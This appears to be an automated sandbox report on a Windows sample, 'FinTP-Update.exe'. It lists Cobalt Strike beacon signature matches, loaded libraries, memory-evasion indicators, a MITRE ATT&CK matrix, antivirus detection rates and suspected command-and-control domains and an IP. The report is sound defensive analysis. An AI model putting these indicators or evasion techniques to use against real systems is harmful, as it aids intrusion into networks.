          Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@2/1@3/1
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
          Source: FinTP-Update.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Users\user\Desktop\FinTP-Update.exe "C:\Users\user\Desktop\FinTP-Update.exe"
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: msvcp140.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: vcruntime140.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: vcruntime140_1.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: napinsp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: pnrpnsp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: wshbth.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: nlaapi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: winrnr.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: FinTP-Update.exe, Static PE information: Image base 0x140000000 > 0x60000000
          Source: FinTP-Update.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: FinTP-Update.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: FinTP-Update.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: FinTP-Update.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: FinTP-Update.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: FinTP-Update.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: FinTP-Update.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb$$ source: FinTP-Update.exe
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb source: FinTP-Update.exe
          Source: FinTP-Update.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: FinTP-Update.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: FinTP-Update.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: FinTP-Update.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: FinTP-Update.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_3_0000017F36AE28CB push esp; retf 0_3_0000017F36AE28D3
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_0000017F38AC339D push edi; iretd 0_2_0000017F38AC339E
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_0000017F38AC4D98 push ebp; iretd 0_2_0000017F38AC4D99
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_0000017F38AC375E push cs; retf 0_2_0000017F38AC375F
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_0000017F38ACCF36 push es; ret 0_2_0000017F38ACCF37
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_0000017F38AED80C push ebp; iretd 0_2_0000017F38AED811
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266186373.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_00007FF7193C28D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7193C28D0
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_00007FF7193C2A78 SetUnhandledExceptionFilter,0_2_00007FF7193C2A78
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_00007FF7193C21D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7193C21D4

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\FinTP-Update.exe, NtProtectVirtualMemory: Indirect: 0x17F38ADA51B
          Source: C:\Users\user\Desktop\FinTP-Update.exe, NtAllocateVirtualMemory: Indirect: 0x17F38ADA154
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_00007FF7193C27B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7193C27B0
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Code function: 0_2_0000017F38AD17A8 GetUserNameA,strrchr,_snprintf,0_2_0000017F38AD17A8
          Source: C:\Users\user\Desktop\FinTP-Update.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Remote Access Functionality

          Source: Yara match, File source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: FinTP-Update.exe PID: 1276, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Process Injection | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Abuse Elevation Control Mechanism | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Obfuscated Files or Information | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Account Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 System Owner/User Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 3 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| FinTP-Update.exe | 8% | ReversingLabs | | |
| FinTP-Update.exe | 100% | Avira | HEUR/AGEN.1317301 | |
          No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | 3.79.209.76 | true | true | | unknown |
| www.flntp.ro | unknown | unknown | true | | unknown |
| www.finttp.ro | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| www.finttp.ro | true | | unknown |
| https://www.flntp.ro/rss/portallogin-gettask.html | true | | unknown |
                                                                                                  https://www.finttp.ro/finttp.ro/rss/portallogin-gettask.htmlFtFinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.flntp.ro/rss/portallogin-gettask.htmlopleFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.flntp.ro/rss/portallogin-gettask.htmlderFinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
